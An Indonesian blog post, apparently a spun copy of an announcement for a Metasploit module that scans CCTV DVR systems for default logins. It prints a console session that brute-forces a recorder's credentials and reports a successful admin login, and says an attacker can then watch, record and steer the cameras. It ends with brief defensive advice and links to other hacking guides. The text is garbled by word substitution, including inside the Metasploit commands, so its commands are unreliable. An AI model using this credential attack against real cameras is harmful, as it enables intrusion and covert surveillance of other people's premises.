Update, Cara Hack Cctv Dengan Metasploit


Modul baru untuk Kerangka Metasploit, cctv_dvr_login , menemukan dan menguji keamanan sistem pengawasan video CCTV (Closed Circuit Television).

Sistem seperti ini sering digunakan di toko ritel, komunitas hidup, tempat tinggal pribadi, dan lingkungan bisnis sebagai bagian dari plan keamanan fisik mereka. Namun, banyak dari sistem ini rentan terhadap eksploitasi yang dapat memungkinkan akses jarak jauh penyerang. Akses jarak jauh semacam itu, diaktifkan secara default, dapat memungkinkan tidak hanya kemampuan untuk melihat video real-time, tetapi juga mengontrol kamera (jika didukung), dan menyediakan akses ke rekaman yang diarsipkan.


Sebagian besar pemilik sistem pengawasan video CCTV mungkin bahkan tidak sepenuhnya menyadari kemampuan akses jarak jauh perangkat karena pemantauan dapat dilakukan secara eksklusif melalui konsol video lokal. Hal ini semakin meningkatkan kemungkinan penyerang mendapatkan / mempertahankan akses jarak jauh, tanpa indikasi kepada pemilik bahwa sistem pengawasan video mereka dan rekaman yang diarsipkan dapat diakses dari jarak jauh.


Di sini, di Gotham Digital Science , kita sering menjumpai sistem pengawasan video selama keterlibatan pengujian penetrasi - beberapa di antaranya mungkin terpapar ke Internet, baik secara sengaja maupun tidak sengaja. Dengan sistem pengawasan video, seringkali menarik (dan kadang-kadang sangat penting) untuk mencari tahu persis apa kamera yang memonitor / merekam di lingkungan. Lebih jauh lagi, akses ke sistem seperti itu sering dapat digunakan untuk mendukung inisiatif pengujian keamanan fisik.



Modul ini menargetkan sistem pengawasan video CCTV mandiri oleh MicroDigital, HIVISION, CTRing, dan sejumlah besar perangkat rebranding lainnya.

msf > utilisation auxiliary/scanner/misc/cctv_dvr_login msf auxiliary(cctv_dvr_login)
    > develop RHOSTS 10.10.1.14 RHOSTS => 10.10.1.14 msf auxiliary(cctv_dvr_login)
    > exploit
 
[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:'admin' amongst password:'' 
[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: 'admin' 
[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:'user'with password:'' 
[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: 'user' 
[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:'admin' amongst password:'admin' 
[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: 'admin' 
[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:'admin' amongst password:'1111' 
[*] 10.10.1.14:5920 Successful login: 'admin' : '1111' 
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80 
[*] Scanned i of i hosts (100% complete) 
[*] Auxiliary module execution completed

Menggunakan kata sandi yang diperoleh, penyerang dapat melihat rekaman langsung dan merekam dan memindahkan kamera melalui aplikasi berbasis web.

Kesimpulannya, pemantauan fisik lokasi sensitif dalam lingkungan merupakan aspek penting dari plan keamanan informasi yang menyeluruh. Namun, pada saat yang sama, perangkat pengawasan video semacam itu dapat menjadi risiko dan sering diabaikan selama audit keamanan dan uji kerentanan / penetrasi.

Modul ini mengeksploitasi salah satu jenis umum sistem pengawasan video CCTV mandiri yang digunakan secara global. Sangat mungkin bahwa produsen lain dan perangkat CCTV juga rentan.

Perusahaan yang ingin melindungi terhadap jenis serangan ini harus mengubah kata sandi vendor default, menggunakan kata sandi yang kuat, menyaring akses hanya ke host tepercaya, dan hanya mengekspos sistem CCTV ke Internet jika benar-benar diperlukan.

Selain itu, profesional keamanan dapat menggunakan modul Metasploit baru untuk memindai jaringan mereka untuk sistem yang rentan.

Modul CCTV baru sudah tersedia di Metasploit Framework. Cukup unduh Metasploit dan perbarui ke versi terbaru menggunakan perintah msfupdate.

Modul ini akan ditambahkan ke edisi Metasploit komersial sebagai bagian dari siklus rilis normal akhir pekan ini.

baca juga:
cara hack android menggunakan metasploit
hack windows jarak jauh menggunakan metasploit
cara hack komputer jarak jauh dengan metasploit
cara hack wifi menggunakan fluxioncara
hack website 2018
cara hack satelit

Comments

Post a Comment

Popular posts from this blog

Update, Download 10+ Peel Bussid / Jitney Simulator Indonesia Keren

Image
Di Postingan sebelumnya saya pernah membuat janji akan berbagi peel bussid untuk ke sekian kalinya. Dan alhamdulillah hari ini saya diberikan kesempatan untuk memenuhi janji saya tersebut. Melalui postingan ini saya ingin membagikan beberapa koleksi livery atau template charabanc simulator Republic of Indonesia yang telah saya kumpulkan dari berbagai sumber di internet. Bagi yang belum sempat mendownload / membaca artikel yang berkenaan dengan livery bussid yang pernah saya posting, silahkan mampir dulu melalui link di bawah ini : Download Koleksi Livery Bussid Persija HD Download 23+ Livery / Template BUSSID (Bus Simulator Indonesia) Keren dan Terbaru Download Kumpulan Livery Bus Simulator Republic of Indonesia Jernih Untuk sobat yang kebetulan adalah seorang Bus Mania atau Pencinta Bus Republic of Indonesia pastinya tidak akan asing mendengar nama-nama charabanc di bawah ini. Sebab, charabanc ini seringkali melintas di jalanan di Indonesia, utamanya di Jalur Pantura hehe. ...
Read more

Update, Five Cara Mengusir Nyamuk Dari Kamar Paling Praktis

Image
5 Cara Mengusir Nyamuk Dari Kamar Ampuh  - Salah satu hal yang menjadi permasalahan beberapa orang adalah banyaknya nyamuk yang mengganggu di dalam kamar mereka. Mulai dari suaranya yang cukup nyaring, sampai gigitannya yang bisa membuat kulit menjadi gatal dan bentol. Sungguh hal itu sangat tidak bisa kita biarkan. Baca juga :  Kenapa Nyamuk Suka Menghisap Darah Manusia? Berbagai cara pun dilakukan untuk bisa mengusir nyamuk dari dalam kamar, mulai dari cara yang biasa seperti menggunakan raket nyamuk, obat nyamuk bakar, semprotan nyamuk, lotion anti nyamuk, dll. Sampai ke cara yang anti-mainstream seperti menyalakan kipas angin dengan book yang tinggi, membakar kemenyan, dupa, dsb :D Semua itu dilakukan semata-mata agar bisa terhindar dari yang namanya nyamuk. Sebetulnya ada cara lain yang lebih simpel dan praktis yang bisa kita lakukan untuk mengusir nyamuk dari dalam kamar. Dan berikut ini adalah v cara mengusir nyamuk paling ampuh dan praktis. Cara Mengusir N...
Read more

Update, Vii Aplikasi Android Teraneh Dan Tidak Berfaedah Yang Ada Di Playstore

Image
7 Aplikasi Android Teraneh dan Tidak Berfaedah yang Ada di Playstore - Melalui playstore kita bisa mendapatkan beragam jenis aplikasi android. Mulai dari aplikasi yang memberikan kemudahan, sampai aplikasi aneh yang tidak memberikan manfaat apa-apa dan malah menjerumuskan. Entah apa yang dipikirkan para pembuat aplikasi tersebut dan apa tujuannya. Yang jelas, aplikasi-aplikasi tersebut masih bisa kita temukan di playstore. Dan berikut ini adalah seven Aplikasi Android paling Aneh yang Tidak Berfaedah sama sekali. 1. Aplikasi Pengusir Nyamuk Aplikasi pengusir nyamuk ini bukan sembarang pengusir nyamuk biasa. Aplikasi ini mampu mengeluarkan gelombang suara dengan frekuensi yang tinggi. Sehingga diyakini kalau hal itu bisa mengusir nyamuk. Saya sendiri pernah mencoba aplikasi yang satu ini. Dan ternyata nyamuknya masih saja tetap bersliweran di mana-mana. Benar-benar tidak berfaedah. 2. Aplikasi Pendeteksi Kebohongan Seperti namanya, kalau aplikasi ini diyakini mampu mendetek...
Read more